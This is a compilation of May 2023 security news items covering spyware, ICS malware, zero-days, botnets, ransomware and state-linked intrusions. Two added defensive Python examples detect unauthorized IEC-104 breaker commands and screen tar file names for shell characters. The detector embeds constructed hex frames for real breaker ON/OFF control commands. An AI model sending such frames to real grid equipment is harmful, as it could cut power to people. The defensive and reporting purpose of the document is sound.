"This is the first documented evidence of the use of Pegasus spyware in an international war context," Access Now said, adding it began an investigation after Apple sent notifications to the individuals in question that they may have been a victim of state-sponsored spyware attacks in November 2021.

There are no conclusive links that connect the spyware use to a specific government agency in either Armenia or Azerbaijan. It's worth noting that Armenia was outed as a customer of Intellexa by Meta in December 2021 in attacks aimed at politicians and journalists in the nation.

What's more, cybersecurity company Check Point earlier this year disclosed that various Armenian entities have been infected with a Windows backdoor referred to as OxtaRAT as part of an espionage campaign aligned with Azerbaijani interests.

In a more unusual turn of events, The New York Times and The Washington Post reported this week that the Mexican government may be spying on itself by using Pegasus against a senior official in charge of investigating alleged military abuses.

Mexico is also the first and most prolific user of Pegasus, despite its promises to cease the illegal use of the notorious spyware.


New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids
28.5.23  Virus  The Hacker News
A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed.

Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to the VirusTotal public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild.

"The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said.

COSMICENERGY is the latest addition to specialized malware like Stuxnet, Havex, Triton, IRONGATE, BlackEnergy2, Industroyer, and PIPEDREAM, which are capable of sabotaging critical systems and wreaking havoc.

Mandiant said that there are circumstantial links that it may have been developed as a red teaming tool by Russian telecom firm Rostelecom-Solar to simulate power disruption and emergency response exercises that were held in October 2021.

This raises the possibility that the malware was either developed to recreate realistic attack scenarios against energy grid assets to test defenses or another party reused code associated with the cyber range.

The second alternative is not unheard of, especially in light of the fact that threat actors are known to adapt and repurpose legitimate red team and post-exploitation tools for malicious ends.

COSMICENERGY's features are comparable to that of Industroyer – which has been attributed to the Kremlin-backed Sandworm group – owing to its ability to exploit an industrial communication protocol called IEC-104 to issue commands to RTUs.

"Leveraging this access, an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption," Mandiant said.

This is accomplished by means of two components called PIEHOP and LIGHTWORK, which are two disruption tools written in Python and C++, respectively, to transmit the IEC-104 commands to the connected industrial equipment.

Another notable aspect of the industrial control system (ICS) malware is the lack of intrusion and discovery capabilities, meaning it requires the operator to perform an internal reconnaissance of the network to determine the IEC-104 device IP addresses to be targeted.

To pull off an attack, a threat actor would therefore have to infect a computer within the network, find a Microsoft SQL Server that has access to the RTUs, and obtain its credentials.

PIEHOP is then run on the machine to upload LIGHTWORK to the server, which sends disruptive remote commands to modify the state of the units (ON or OFF) over TCP. It also immediately deletes the executable after issuing the instructions.
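As an added detection-side example (not code from Mandiant or from the COSMICENERGY samples), the following Python parses reassembled IEC-104 payloads from TCP/2404 sessions, extracts the single and double commands (ASDU types 45 and 46) that switch a point ON or OFF, and raises an alert whenever such a command originates from a host that is not a known SCADA master. The sample frames, IP addresses and master list are constructed; field layouts follow the public IEC 60870-5-104 structure.

```python
from dataclasses import dataclass

START_BYTE = 0x68
# ASDU type identifiers in the control direction (IEC 60870-5-101 / -104).
C_SC_NA_1 = 45  # single command: ON/OFF for one point, e.g. a breaker
C_DC_NA_1 = 46  # double command: OFF/ON with an explicit intermediate state
CONTROL_TYPES = {C_SC_NA_1: "C_SC_NA_1", C_DC_NA_1: "C_DC_NA_1"}


@dataclass
class ControlCommand:
    type_id: int
    cot: int          # cause of transmission; 6 = activation
    common_addr: int  # common address of ASDU (the station)
    ioa: int          # information object address (3 bytes in IEC-104)
    state: str        # "ON", "OFF" or "INVALID"
    select: bool      # S/E bit: True = select, False = execute


def split_apdus(payload: bytes):
    """Yield (control_field, asdu) for each APDU in a reassembled TCP payload.
    Stops at a truncated trailing frame; raises if the stream is desynchronised."""
    pos = 0
    while pos + 2 <= len(payload):
        if payload[pos] != START_BYTE:
            raise ValueError(f"expected start byte 0x68 at offset {pos}")
        length = payload[pos + 1]
        frame = payload[pos + 2 : pos + 2 + length]
        if length < 4 or len(frame) < length:
            break
        yield frame[:4], frame[4:]
        pos += 2 + length


def extract_control_commands(payload: bytes) -> list[ControlCommand]:
    """Return every single/double command carried in I-format APDUs."""
    commands = []
    for control, asdu in split_apdus(payload):
        if control[0] & 0x01:      # S-format (..01) or U-format (..11): carries no ASDU
            continue
        if len(asdu) < 10:         # 6-byte ASDU header + 3-byte IOA + 1-byte element
            continue
        type_id, vsq = asdu[0], asdu[1]
        if type_id not in CONTROL_TYPES:
            continue
        if vsq & 0x80 or (vsq & 0x7F) != 1:
            # Commands carry exactly one information object (SQ=0, N=1);
            # anything else is malformed and worth its own log line.
            continue
        cot = asdu[2] & 0x3F
        common_addr = asdu[4] | (asdu[5] << 8)
        ioa = asdu[6] | (asdu[7] << 8) | (asdu[8] << 16)
        qualifier = asdu[9]
        select = bool(qualifier & 0x80)
        if type_id == C_SC_NA_1:
            state = "ON" if qualifier & 0x01 else "OFF"                     # SCS bit
        else:
            state = {1: "OFF", 2: "ON"}.get(qualifier & 0x03, "INVALID")   # DCS bits
        commands.append(ControlCommand(type_id, cot, common_addr, ioa, state, select))
    return commands


def detect_unauthorized_control(flows, authorized_masters) -> list[str]:
    """flows: iterable of (src_ip, dst_ip, payload) for TCP/2404 sessions.
    Every control command sent by a host outside `authorized_masters` is an alert;
    commands from known masters are expected traffic and produce nothing."""
    alerts = []
    for src, dst, payload in flows:
        if src in authorized_masters:
            continue
        for cmd in extract_control_commands(payload):
            mode = "select" if cmd.select else "execute"
            alerts.append(
                f"{src} -> {dst}: {CONTROL_TYPES[cmd.type_id]} {cmd.state} ({mode}) "
                f"IOA={cmd.ioa} CA={cmd.common_addr} COT={cmd.cot}"
            )
    return alerts


# Constructed sample payload (not a capture from any real network):
SAMPLE_STREAM = bytes.fromhex(
    "68 04 07 00 00 00 "                                 # U-format STARTDT act, no ASDU
    "68 0E 00 00 00 00 01 01 03 00 01 00 05 00 00 01 "   # M_SP_NA_1 (type 1) monitor point, ignored
    "68 0E 02 00 02 00 2D 01 06 00 01 00 01 01 00 01 "   # C_SC_NA_1: execute ON, IOA 257
    "68 0E 04 00 02 00 2E 01 06 00 01 00 02 01 00 81 "   # C_DC_NA_1: select OFF, IOA 258
)

if __name__ == "__main__":
    for line in detect_unauthorized_control(
        [("10.0.5.77", "10.0.9.20", SAMPLE_STREAM)], authorized_masters={"10.0.1.10"}
    ):
        print(line)
```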

The fact that an ICS malware family has been identified prior to it being actively used in real-world attacks makes it an unusual find, Daniel Kapellmann Zafra, analysis manager at Google Cloud's Mandiant Intelligence division, told The Hacker News.

"While COSMICENERGY's capabilities are not significantly different from previous OT malware families', its discovery highlights several notable developments in the OT threat landscape," Mandiant said.

"The discovery of new OT malware presents an immediate threat to affected organizations, since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon."

"One of the main lessons from COSMICENERGY is that defenders should be familiar with prior OT [operational technology] malware families, their capabilities, and how they work," Kapellmann Zafra said.

"Knowledge about this can help defenders to sustain threat hunting and detection programs that rigorously look for behaviors that are known to be suspicious in OT networks."


Barracuda Warns of Zero-Day Exploited to Breach Email Security Gateway Appliances
28.5.23  Exploit  The Hacker News
Email protection and network security services provider Barracuda is warning users about a zero-day flaw that it said has been exploited to breach the company's Email Security Gateway (ESG) appliances.

The zero-day is being tracked as CVE-2023-2868 and has been described as a remote code injection vulnerability affecting versions 5.1.3.001 through 9.2.0.006.

The California-headquartered firm said the issue is rooted in a component that screens the attachments of incoming emails.

"The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar file (tape archives)," according to an advisory from the NIST's national vulnerability database.

"The vulnerability stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can specifically format these file names in a particular manner that will result in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product."
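To illustrate the input-validation gap the NVD description points at, here is an added example (not Barracuda's code, and not a reconstruction of the ESG component) of how a gateway can screen every tar member name against a strict allowlist before anything else touches the archive. The allowlist, the `UnsafeArchiveName` type and the `build_tar` helper that constructs the in-memory test archives are all assumptions of this example.

```python
import io
import re
import tarfile

# Allowlist for one path segment of an archive entry: starts with a letter or
# digit and contains only letters, digits, '.', '_', '+', '-'. Everything a
# shell might interpret (quotes, backticks, $, ;, |, &, spaces, newlines) is
# rejected, as are hidden files and empty segments. Conservative on purpose.
_SAFE_SEGMENT = re.compile(r"[A-Za-z0-9][A-Za-z0-9._+-]{0,254}")
MAX_NAME_LEN = 1024


class UnsafeArchiveName(ValueError):
    def __init__(self, name: str, reason: str):
        super().__init__(f"{reason}: {name!r}")
        self.name = name


def validate_member_name(name: str) -> None:
    """Raise UnsafeArchiveName unless `name` is a plain relative path made of
    allowlisted segments. Absolute paths and '..' traversal are rejected too."""
    if not name or len(name) > MAX_NAME_LEN:
        raise UnsafeArchiveName(name, "empty or overlong name")
    if name.startswith("/") or "\\" in name or "\x00" in name:
        raise UnsafeArchiveName(name, "absolute path or forbidden character")
    for segment in name.rstrip("/").split("/"):
        if segment in ("", ".", ".."):
            raise UnsafeArchiveName(name, "empty, '.' or '..' path segment")
        if not _SAFE_SEGMENT.fullmatch(segment):
            raise UnsafeArchiveName(name, "segment has characters outside the allowlist")


def screen_tar(data: bytes) -> dict:
    """Inspect every entry of a tar blob without extracting anything.
    One bad name (or symlink/hardlink target) fails the whole archive."""
    report = {"ok": True, "names": [], "rejected": None, "reason": None}
    try:
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for member in tf:
                for candidate in (member.name, member.linkname):
                    if candidate:
                        validate_member_name(candidate)
                report["names"].append(member.name)
    except UnsafeArchiveName as exc:
        report.update(ok=False, rejected=exc.name, reason=str(exc))
    except tarfile.TarError as exc:
        report.update(ok=False, reason=f"malformed archive: {exc}")
    return report


def build_tar(names: list[str]) -> bytes:
    """Constructed test input: an in-memory tar of one-byte files with the given names."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in names:
            info = tarfile.TarInfo(name=name)
            info.size = 1
            tf.addfile(info, io.BytesIO(b"x"))
    return buf.getvalue()
```

The allowlist is defence in depth, not a substitute for the real fix: names that pass it should still be handed to any downstream scanner as separate argv elements (a `subprocess.run` list with `shell=False`), never interpolated into a command string the way a `qx`-style call does.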

The shortcoming, Barracuda noted, was identified on May 19, 2023, prompting the company to deploy a patch across all ESG devices worldwide a day later. A second fix was released on May 21 as part of its "containment strategy."

Additionally, the company's investigation uncovered evidence of active exploitation of CVE-2023-2868, resulting in unauthorized access to a "subset of email gateway appliances."

The company, which has over 200,000 global customers, did not disclose the scale of the attack. It said affected users have been directly contacted with a list of remedial actions to take.

Barracuda has also urged its customers to review their environments, adding it's still actively monitoring the situation.

The identity of the threat actors behind the attack is currently not known, but Chinese and Russian hacking groups have been observed deploying bespoke malware on vulnerable Cisco, Fortinet, and SonicWall devices in recent months.

The development comes as Defiant alerted of large-scale exploitation of a now-fixed cross-site scripting (XSS) flaw in a plugin called Beautiful Cookie Consent Banner (CVSS score: 7.2) that's installed on over 40,000 sites.

The vulnerability offers unauthenticated attackers the ability to inject malicious JavaScript to a website, potentially allowing redirects to malvertising sites as well as the creation of rogue admin users, resulting in site takeovers.

The WordPress security company said it "blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing."

Update
The U.S. Cybersecurity and Infrastructure Security Agency on Friday added the remote code injection vulnerability impacting Barracuda ESG appliances to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the fixes by June 16, 2023.


Dark Frost Botnet Launches Devastating DDoS Attacks on Gaming Industry
25.5.23  BotNet  The Hacker News
DDoS Attacks
A new botnet called Dark Frost has been observed launching distributed denial-of-service (DDoS) attacks against the gaming industry.

"The Dark Frost botnet, modeled after Gafgyt, QBot, Mirai, and other malware strains, has expanded to encompass hundreds of compromised devices," Akamai security researcher Allen West said in a new technical analysis shared with The Hacker News.

Targets include gaming companies, game server hosting providers, online streamers, and even other gaming community members with whom the threat actor has interacted directly.

As of February 2023, the botnet comprises 414 machines running various instruction set architectures such as ARMv4, x86, MIPSEL, MIPS, and ARM7.

Botnets are usually made up of a vast network of compromised devices around the world. The operators tend to use the enslaved hosts to mine cryptocurrency, steal sensitive data, or harness the collective internet bandwidth from these bots to knock down other websites and internet servers by flooding the targets with junk traffic.

Dark Frost represents the latest iteration of a botnet that appears to have been stitched together by stealing source code from various botnet malware strains such as Mirai, Gafgyt, and QBot.

Akamai, which reverse-engineered the botnet after flagging it on February 28, 2023, pegged its attack potential at approximately 629.28 Gbps through a UDP flood attack. The threat actor is believed to be active since at least May 2022.

"What makes this particular case interesting is that the actor behind these attacks has published live recordings of their attacks for all to see," the web infrastructure company said.

"The actor was observed boasting about their achievements on social media, utilizing the botnet for petty online disputes, and even leaving digital signatures on their binary file."
The adversary has further set up a Discord channel to facilitate attacks in exchange for money, indicating their financial motivations and plans to flesh it out as a DDoS-for-hire service.

Dark Frost constitutes a modern example of how easy it is for novice cybercriminals with rudimentary coding skills to spring into action using already available malware to inflict significant damage on enterprises.

"The reach that these threat actors can have is staggering despite the lack of novelty in their techniques," West said. "Although not the most advanced or mind-bending adversary, the Dark Frost botnet has still managed to accumulate hundreds of compromised devices to do its bidding."


Zyxel Issues Critical Security Patches for Firewall and VPN Products
25.5.23  Vulnerebility  The Hacker News
Zyxel
Zyxel has released software updates to address two critical security flaws affecting select firewall and VPN products that could be abused by remote attackers to achieve code execution.

Both the flaws – CVE-2023-33009 and CVE-2023-33010 – are buffer overflow vulnerabilities and are rated 9.8 out of 10 on the CVSS scoring system.

A brief description of the two issues is below -

CVE-2023-33009 - A buffer overflow vulnerability in the notification function that could enable an unauthenticated attacker to cause a denial-of-service (DoS) condition and remote code execution.
CVE-2023-33010 - A buffer overflow vulnerability in the ID processing function that could enable an unauthenticated attacker to cause a denial-of-service (DoS) condition and remote code execution.
The following devices are impacted -

ATP (versions ZLD V4.32 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2)
USG FLEX (versions ZLD V4.50 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2)
USG FLEX50(W) / USG20(W)-VPN (versions ZLD V4.25 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2)
VPN (versions ZLD V4.30 to V5.36 Patch 1, patched in ZLD V5.36 Patch 2), and
ZyWALL/USG (versions ZLD V4.25 to V4.73 Patch 1, patched in ZLD V4.73 Patch 2)
Security researchers from TRAPA Security and STAR Labs SG have been credited with discovering and reporting the flaws.

The advisory comes less than a month after Zyxel shipped fixes for another critical security flaw in its firewall devices that could be exploited to achieve remote code execution on affected systems.

The issue, tracked as CVE-2023-28771 (CVSS score: 9.8), was also credited to TRAPA Security, with the networking equipment maker blaming it on improper error message handling. It has since come under active exploitation by threat actors associated with the Mirai botnet.


New PowerExchange Backdoor Used in Iranian Cyber Attack on UAE Government
25.5.23  Virus  The Hacker News
Microsoft Exchange backdoor

An unnamed government entity associated with the United Arab Emirates (U.A.E.) was targeted by a likely Iranian threat actor to breach the victim's Microsoft Exchange Server with a "simple yet effective" backdoor dubbed PowerExchange.

According to a new report from Fortinet FortiGuard Labs, the intrusion relied on email phishing as an initial access pathway, leading to the execution of a .NET executable contained within a ZIP file attachment.

The binary, which masquerades as a PDF document, functions as a dropper to execute the final payload, which then launches the backdoor.

PowerExchange, written in PowerShell, employs text files attached to emails for command-and-control (C2) communication. It allows the threat actor to run arbitrary payloads and upload and download files from and to the system.

The custom implant achieves this by making use of the Exchange Web Services (EWS) API to connect to the victim's Exchange Server and uses a mailbox on the server to send and receive encoded commands from its operator.

"The Exchange Server is accessible from the internet, saving C2 communication to external servers from the devices in the organizations," Fortinet researchers said. "It also acts as a proxy for the attacker to mask himself."

That said, it's currently not known how the threat actor managed to obtain the domain credentials to connect to the target Exchange Server.

Fortinet's investigation also uncovered Exchange servers that were backdoored with several web shells, one of which is called ExchangeLeech (aka System.Web.ServiceAuthentication.dll), to achieve persistent remote access and steal user credentials.
PowerExchange is suspected to be an upgraded version of TriFive, which was previously used by the Iranian nation-state actor APT34 (aka OilRig) in intrusions targeting government organizations in Kuwait.

Furthermore, communication via internet-facing Exchange servers is a tried-and-tested tactic adopted by the OilRig actors, as observed in the case of Karkoff and MrPerfectionManager.

"Using the victim's Exchange server for the C2 channel allows the backdoor to blend in with benign traffic, thereby ensuring that the threat actor can easily avoid nearly all network-based detections and remediations inside and outside the target organization's infrastructure," the researchers said.


Alert: Brazilian Hackers Targeting Users of Over 30 Portuguese Banks
25.5.23  Hacking  The Hacker News
Brazilian hackers
A Brazilian threat actor is targeting more than 30 Portuguese financial institutions with information-stealing malware as part of a long-running campaign that commenced in 2021.

"The attackers can steal credentials and exfiltrate users' data and personal information, which can be leveraged for malicious activities beyond financial gain," SentinelOne researchers Aleksandar Milenkoski and Tom Hegel said in a new report shared with The Hacker News.

The cybersecurity firm, which began tracking "Operation Magalenha" earlier this year, said the intrusions culminate in the deployment of two variants of a backdoor called PeepingTitle so as to "maximize attack potency."

The links to Brazil stem from the use of the Brazilian-Portuguese language within the detected artifacts as well as source code overlaps with another banking trojan known as Maxtrilha, which was first disclosed in September 2021.

PeepingTitle, like Maxtrilha, is written in the Delphi programming language and is equipped to grant the attacker full control over the compromised hosts as well as capture screenshots and drop additional payloads.

The attack chains begin with phishing emails and rogue websites hosting fake installers for popular software that are engineered to launch a Visual Basic Script responsible for executing a malware loader. The loader subsequently downloads and executes the PeepingTitle backdoors.

PeepingTitle monitors users' web browsing activity, and if a browser tab matching one of the target financial institutions is opened, it exfiltrates screen captures and stages further malware executables from a remote server.

This is achieved by comparing the window title to a predefined set of strings related to targeted organizations, but not before transforming it into a lowercase string stripped of any whitespace characters.
"With the first PeepingTitle variant capturing the entire screen, and the second capturing each window a user interacts with, this malware duo provides the threat actor with a detailed insight into user activity," the researchers explained.

An important aspect of Magalenha is the shift from DigitalOcean and Dropbox in 2022 to Timeweb Cloud, a Russian cloud service provider that has a more lenient approach towards infrastructure abuse, for malware hosting and command-and-control.

The sophisticated hacking effort represents the latest iteration in a long line of financially motivated malware campaigns originating from Latin America. Earlier this March, Metabase Q uncovered a Mispadu attack wave targeting Bolivia, Chile, Mexico, Peru, and Portugal.

"Operation Magalenha indicates the persistent nature of the Brazilian threat actors," the researchers said. "These groups represent an evolving threat to organizations and individuals in their target countries and have demonstrated a consistent capacity to update their malware arsenal and tactics, allowing them to remain effective in their campaigns."

"Their capacity to orchestrate attacks in Portuguese- and Spanish-speaking countries in Europe, Central, and Latin America suggests an understanding of the local financial landscape and a willingness to invest time and resources in developing targeted campaigns."


Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code
25.5.23  Ransomware  The Hacker News
Buhti Ransomware Gang
The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems.

"While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a report shared with The Hacker News.

The cybersecurity firm is tracking the cybercrime group under the name Blacktail. Buhti was first highlighted by Palo Alto Networks Unit 42 in February 2023, describing it as a Golang ransomware targeting the Linux platform.

Later that same month, Bitdefender revealed the use of a Windows variant that was deployed against Zoho ManageEngine products that were vulnerable to critical remote code execution flaws (CVE-2022-47966).

The operators have since been observed swiftly exploiting other severe bugs impacting IBM's Aspera Faspex file exchange application (CVE-2022-47986) and PaperCut (CVE-2023-27350) to drop the ransomware.

The latest findings from Symantec show that Blacktail's modus operandi might be changing, what with the actor leveraging modified versions of the leaked LockBit 3.0 and Babuk ransomware source code to target Windows and Linux, respectively.

Both Babuk and LockBit have had their ransomware source code published online, in September 2021 and September 2022 respectively, spawning multiple imitators.

One notable cybercrime group that's already using the LockBit ransomware builder is the Bl00dy Ransomware Gang, which was recently spotlighted by U.S. government agencies as exploiting vulnerable PaperCut servers in attacks against the education sector in the country.

Despite the rebranding changes, Blacktail has been observed utilizing a custom data exfiltration utility written in Go that's designed to steal files with specific extensions in the form of a ZIP archive prior to encryption.

"While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail's general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated," Symantec said.

Ransomware continues to pose a persistent threat for enterprises. Fortinet FortiGuard Labs, earlier this month, detailed a Go-based ransomware family called Maori that's specifically designed to run on Linux systems.
While the use of Go and Rust signals an interest on the part of threat actors to develop "adaptive" cross-platform ransomware and maximize the attack surface, it's also a sign of an ever-evolving cybercrime ecosystem where new techniques are adopted on a continual basis.

"Major ransomware gangs are borrowing capabilities from either leaked code or code purchased from other cybercriminals, which may improve the functionality of their own malware," Kaspersky noted in its ransomware trends report for 2023.

Indeed, according to Cyble, a new ransomware family dubbed Obsidian ORB takes a leaf out of the book of Chaos, which has also been the foundation for other ransomware strains like BlackSnake and Onyx.

What makes the ransomware stand out is that it employs a rather distinctive ransom payment method, demanding that victims pay the ransom through gift cards as opposed to cryptocurrency payments.

"This approach is effective and convenient for threat actors (TAs) as they can modify and customize the code to their preferences," the cybersecurity firm said.


China's Stealthy Hackers Infiltrate U.S. and Guam Critical Infrastructure Undetected
25.5.23  BigBrothers  The Hacker News

Critical Infrastructure Cybersecurity
A stealthy China-based group managed to establish a persistent foothold into critical infrastructure organizations in the U.S. and Guam without being detected, Microsoft and the "Five Eyes" nations said on Wednesday.

The tech giant's threat intelligence team is tracking the activity, which includes post-compromise credential access and network system discovery, under the name Volt Typhoon.

The state-sponsored actor is geared towards espionage and information gathering, with the cluster active since June 2021 and obscuring its intrusion footprint by taking advantage of tools already installed or built into infected machines.

Some of the prominent sectors targeted include communications, manufacturing, utility, transportation, construction, maritime, government, information technology, and education.

The company further assessed with moderate confidence that the campaign is "pursuing development of capabilities that could disrupt critical communications infrastructure between the United States and Asia region during future crises."

A defining characteristic of the attacks is the "strong emphasis" on staying under the radar by exclusively relying on living-off-the-land (LotL) techniques to exfiltrate data from local web browser applications and leverage stolen credentials for backdoor access.

The main goal is to sidestep detection by harmonizing with regular Windows system and network activities, indicating that the threat actor is deliberately keeping a low profile to gain access to sensitive information.

"In addition, Volt Typhoon tries to blend into normal network activity by routing traffic through compromised small office and home office (SOHO) network equipment, including routers, firewalls, and VPN hardware," Microsoft said.

Another unusual tradecraft is the use of custom versions of open source tools to establish a command-and-control (C2) channel over proxy as well as other organizations' compromised servers in its C2 proxy network to hide the source of the attacks.

In one incident reported on by the New York Times, the adversarial collective breached telecommunications networks on the island of Guam, a sensitive U.S. military outpost in the Pacific Ocean, and installed a malicious web shell.

The initial entry vector involves exploiting internet-facing Fortinet FortiGuard devices by means of an unknown zero-day flaw, although Volt Typhoon has also been observed weaponizing flaws in Zoho ManageEngine servers. The access is then abused to steal credentials and break into other devices on the network.
The Windows maker also noted that it directly notified targeted or compromised customers and provided them with the necessary information to secure their environments.

It, however, warned that it could be "particularly challenging" to mitigate such risks when threat actors make use of valid accounts and living-off-the-land binaries (LOLBins) to pull off their attacks.

Secureworks, which is monitoring the threat group under the name Bronze Silhouette, said it has "demonstrated careful consideration for operational security [...] and reliance on compromised infrastructure to prevent detection and attribution of its intrusion activity."

The development also comes as Reuters disclosed that Chinese hackers targeted Kenya's government in a far-reaching three-year-long series of attacks against key ministries and state institutions in an alleged attempt to obtain information about the "debt owed to Beijing by the East African nation."

The digital offensive is suspected to have been carried out by BackdoorDiplomacy (aka APT15, Playful Taurus, or Vixen Panda), which is known to target government and diplomatic entities across North America, South America, Africa, and the Middle East at least since 2010.


Iranian Agrius Hackers Targeting Israeli Organizations with Moneybird Ransomware
25.5.23  BigBrothers  The Hacker News
Moneybird Ransomware
The Iranian threat actor known as Agrius is leveraging a new ransomware strain called Moneybird in its attacks targeting Israeli organizations.

Agrius, also known as Pink Sandstorm (formerly Americium), has a track record of staging destructive data-wiping attacks aimed at Israel under the guise of ransomware infections.

Microsoft has attributed the threat actor to Iran's Ministry of Intelligence and Security (MOIS), which also operates MuddyWater. It's known to be active since at least December 2020.

In December 2022, the hacking crew was attributed to a set of attempted disruptive intrusions that were directed against diamond industries in South Africa, Israel, and Hong Kong.

These attacks involved the use of a .NET-based wiper-turned-ransomware called Apostle and its successor known as Fantasy. Unlike Apostle, Moneybird is programmed in C++.

"The use of a new ransomware, written in C++, is noteworthy, as it demonstrates the group's expanding capabilities and ongoing effort in developing new tools," Check Point researchers Marc Salinas Fernandez and Jiri Vinopal said.

The infection sequence begins with the exploitation of vulnerabilities within internet-exposed web servers, leading to the deployment of a web shell referred to as ASPXSpy.

In the subsequent steps, the web shell is used as a conduit to deliver publicly-known tools in order to perform reconnaissance of the victim environment, move laterally, harvest credentials, and exfiltrate data.

Also executed on the compromised host is the Moneybird ransomware, which is engineered to encrypt sensitive files in the "F:\User Shares" folder and drop a ransom note urging the company to contact them within 24 hours or risk getting their stolen information leaked.

"The use of a new ransomware demonstrates the actor's additional efforts to enhance capabilities, as well as hardening attribution and detection efforts," the researchers said. "Despite these new 'covers,' the group continues to follow its usual behavior and utilize similar tools and techniques as before."
Agrius is far from the only Iranian state-sponsored group to engage in cyber operations targeting Israel. A report from Microsoft last month uncovered MuddyWater's collaboration with another cluster dubbed Storm-1084 (aka DEV-1084) to deploy the DarkBit ransomware.

The findings also come as ClearSky disclosed that no fewer than eight websites associated with shipping, logistics, and financial services companies in Israel were compromised as part of a watering hole attack orchestrated by the Iran-linked Tortoiseshell group.

In a related development, Proofpoint revealed that regional managed service providers (MSPs) within Israel have been targeted by MuddyWater as part of a phishing campaign designed to initiate supply chain attacks against their downstream customers.

The enterprise security firm further highlighted escalating threats to small and medium-sized businesses (SMBs) from sophisticated threat groups, which have been observed leveraging compromised SMB infrastructure for phishing campaigns and financial theft.


GUAC 0.1 Beta: Google's Breakthrough Framework for Secure Software Supply Chains
25.5.23  Security  The Hacker News
Google
Google on Wednesday announced the 0.1 Beta version of GUAC (short for Graph for Understanding Artifact Composition) for organizations to secure their software supply chains.

To that end, the search giant is making available the open source framework as an API for developers to integrate their own tools and policy engines.

GUAC aims to aggregate software security metadata from different sources into a graph database that maps out relationships between software, helping organizations determine how one piece of software affects another.

"Graph for Understanding Artifact Composition (GUAC) gives you organized and actionable insights into your software supply chain security position," Google says in its documentation.

"GUAC ingests software security metadata, like SBOMs, and maps out the relationship between software so that you can fully understand your software security position."

In other words, it's designed to bring together Software Bill of Materials (SBOM) documents, SLSA attestations, OSV vulnerability feeds, deps.dev insights, and a company's internal private metadata to help create a better picture of the risk profile and visualize the relationships between artifacts, packages, and repositories.
With such a setup in place, the goal is to tackle high-profile supply chain attacks, generate a patch plan, and swiftly respond to security compromises.

"For example, GUAC can be used to certify that a builder is compromised (e.g., via credential leakage or ingestion of malware) and then query for affected artifacts," Google said.

"This enables the [chief information security officer] to easily create a policy to forbid use of any software from within the blast radius."


Iranian Tortoiseshell Hackers Targeting Israeli Logistics Industry
25.5.23  BigBrothers  The Hacker News
Iranian Tortoiseshell Hackers
At least eight websites associated with shipping, logistics, and financial services companies in Israel were targeted as part of a watering hole attack.

Tel Aviv-based cybersecurity company ClearSky attributed the attacks with low confidence to an Iranian threat actor tracked as Tortoiseshell, which is also called Crimson Sandstorm (previously Curium), Imperial Kitten, and TA456.

"The infected sites collect preliminary user information through a script," ClearSky said in a technical report published Tuesday. Most of the impacted websites have been stripped of the rogue code.

Tortoiseshell is known to be active since at least July 2018, with early attacks targeting IT providers in Saudi Arabia. It has also been observed setting up fake hiring websites for U.S. military veterans in a bid to trick them into downloading remote access trojans.

That said, this is not the first time Iranian activity clusters have set their sights on the Israeli shipping sector with watering holes.

The attack method, also called strategic website compromises, works by infecting a website that's known to be commonly visited by a group of users or those within a specific industry to enable the distribution of malware.

In August 2022, an emerging Iranian actor named UNC3890 was attributed to a watering hole hosted on a login page of a legitimate Israeli shipping company that's designed to transmit preliminary data about the logged-in user to an attacker-controlled domain.

The latest intrusions documented by ClearSky show that the malicious JavaScript injected into the websites functions in a similar manner, collecting information about the system and sending it to a remote server.
The JavaScript code further attempts to determine the user's language preference, which ClearSky said could be "useful to the attacker to customize their attack based on the user's language."

On top of that, the attacks also make use of a domain named jquery-stack[.]online for command-and-control (C2). The goal is to fly under the radar by impersonating the legitimate jQuery JavaScript framework.

The development comes as Israel continues to be the most prominent target for Iranian state-sponsored crews. Microsoft, earlier this month, highlighted their new approach of combining "offensive cyber operations with multi-pronged influence operations to fuel geopolitical change in alignment with the regime's objectives."


Data Stealing Malware Discovered in Popular Android Screen Recorder App
24.5.23  Android  The Hacker News
Data Stealing Malware
Google has removed a screen recording app named "iRecorder - Screen Recorder" from the Play Store after it was found to sneak in information stealing capabilities nearly a year after the app was published as an innocuous app.

The app (APK package name "com.tsoft.app.iscreenrecorder"), which accrued over 50,000 installations, was first uploaded on September 19, 2021. The malicious functionality is believed to have been introduced in version 1.3.8, which was released on August 24, 2022.

"It is rare for a developer to upload a legitimate app, wait almost a year, and then update it with malicious code," ESET security researcher LukᚠŠtefanko said in a technical report.

"The malicious code that was added to the clean version of iRecorder is based on the open source AhMyth Android RAT (remote access trojan) and has been customized into what we named AhRat."

iRecorder was first flagged as harboring the AhMyth trojan on October 28, 2022, by Kaspersky security analyst Igor Golovin, indicating that the app managed to stay accessible all this time and even received a new update as recently as February 26, 2023.

The application's malicious behavior specifically involves extracting microphone recordings and harvesting files with specific extensions, with ESET describing AhRat as a lightweight version of AhMyth.

The data gathering characteristic points to a possible espionage motive, although there is no evidence to link the activity to any known threat actor. However, AhMyth has been previously employed by Transparent Tribe in attacks targeting South Asia.

